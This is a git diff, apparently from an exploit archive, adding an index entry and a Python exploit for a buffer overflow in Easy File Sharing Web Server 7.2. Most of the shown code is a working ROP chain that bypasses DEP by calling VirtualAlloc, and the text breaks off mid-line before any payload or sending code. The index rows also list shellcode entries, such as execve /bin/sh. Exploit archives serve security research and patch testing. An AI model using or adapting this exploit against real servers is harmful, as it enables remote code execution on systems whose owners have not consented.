diff --git a/files.csv b/files.csv
index d822f346e..f0c0ec080 100644
--- a/files.csv
+++ b/files.csv
@@ -15688,6 +15688,7 @@ id,file,description,date,author,platform,type,port
 42296,platforms/unix/remote/42296.rb,"GoAutoDial 3.3 - Authentication Bypass / Command Injection (Metasploit)",2017-07-05,Metasploit,unix,remote,443
 42297,platforms/php/remote/42297.py,"Lepide Auditor Suite - 'createdb()' Web Console Database Injection / Remote Code Execution",2017-07-05,mr_me,php,remote,7778
 42303,platforms/multiple/remote/42303.txt,"Yaws 1.91 - Remote File Disclosure",2017-07-07,hyp3rlinx,multiple,remote,0
+42304,platforms/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
diff --git a/platforms/windows/remote/42304.py b/platforms/windows/remote/42304.py
new file mode 100755
index 000000000..d824a05e6
--- /dev/null
+++ b/platforms/windows/remote/42304.py
@@ -0,0 +1,151 @@
+#!/usr/bin/python
+# Exploit Title: Easy File Sharing Web Server 7.2 - GET Buffer Overflow (DEP Bypass with ROP)
+# Date: 8 July 2017
+# Exploit Author: Sungchul Park
+# Author Contact: lxmania7@gmail.com
+# Vendor Homepage: http://www.sharing-file.com
+# Software Link: http://www.sharing-file.com/efssetup.exe
+# Version: Easy File Sharing Web Server 7.2
+# Tested on: Winows 7 SP1
+
+import socket, struct
+
+def create_rop_chain():
+
+ # rop chain generated with mona.py - www.corelan.be
+ rop_gadgets = [
+ # For EDX -> flAllocationType(0x1000) [ EAX to EBX ]
+ # 0x00000000, # [-] Unable to find gadget to put 00001000 into edx
+ 0x10015442, # POP EAX # RETN [ImageLoad.dll]
+ 0xFFFFEFFF, # -1001 (static value)
+ 0x100231d1, # NEG EAX # RETN [ImageLoad.dll]
+ 0x1001614d, # DEC EAX # RETN [ImageLoad.dll]
+ 0x1001da09, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
+ 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]
+ 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]
+ 0x10015442, # POP EAX # RETN [ImageLoad.dll]
+ 0x1004de84, # &Writable location [ImageLoad.dll]
+
+ # For EDX -> flAllocationType(0x1000) [ EBX to EDX ]
+ 0x10022c4c, # XOR EDX,EDX # RETN [ImageLoad.dll]
+ 0x10022c1e, # ADD EDX,EBX # POP EBX # RETN 0x10 [ImageLoad.dll]
+ 0xffffffff, # Filler (Compensation for POP EBX)
+
+ # For ESI -> &VirtualAlloc
+ 0x10015442, # POP EAX # RETN [ImageLoad.dll]
+ 0xffffffff, # Filler \
+ 0xffffffff, # Filler |
+ 0xffffffff, # Filler | => (Compensation for RETN 0x10)
+ 0xffffffff, # Filler /
+ 0x1004d1fc, # ptr to &VirtualAlloc() [IAT ImageLoad.dll]
+ 0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
+ 0x61c0a798, # XCHG EAX,EDI # RETN [sqlite3.dll]
+ 0x1001aeb4, # POP ESI # RETN [ImageLoad.dll]
+ 0xffffffff, #
+ 0x1001715d, # INC ESI # ADD AL,3A # RETN [ImageLoad.dll]
+ 0x10021a3e, # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
+
+ # For EBP -> Return Address
+ 0x10013860, # POP EBP # RETN [ImageLoad.dll]
+ 0x61c24169, # & push esp # ret [sqlite3.dll]
+
+ # For EBX -> dwSize(0x01)
+ 0x100132ba, # POP EBX # RETN [ImageLoad.dll]
+ 0xffffffff, #
+ 0x61c2785d, # INC EBX # ADD AL,83 # RETN [sqlite3.dll]
+ 0x1001f6da, # INC EBX # ADD AL,83 # RETN [ImageLoad.dll]
+
+ # For ECX -> flProtect(0x40)
+ 0x10019dfa, # POP ECX # RETN [ImageLoad.dll]
+ 0xffffffff, #
+ 0x61c68081, # INC ECX # ADD AL,39 # RETN [sqlite3.dll]
+ 0x61c68081, # INC ECX # ADD AL,39 # RETN [sqlite3.dll]
+ 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll]
+ 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll]
+ 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll]
+ 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll]
+ 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll]
+ 0x61c06831, # ADD ECX,ECX # RETN [sqlite3.dll]
+
+ # For EDI -> ROP NOP
+ 0x61c373a4, # POP EDI # RETN [sqlite3.dll]
+ 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]
+ # For EAX -> NOP(0x90)
+ 0x10015442, # POP EAX # RETN [ImageLoad.dll]
+ 0x90909090, # nop
+ 0x100240c2, # PUSHAD # RETN [ImageLoad.dll]
+ ]
+ return ''.join(struct.pack('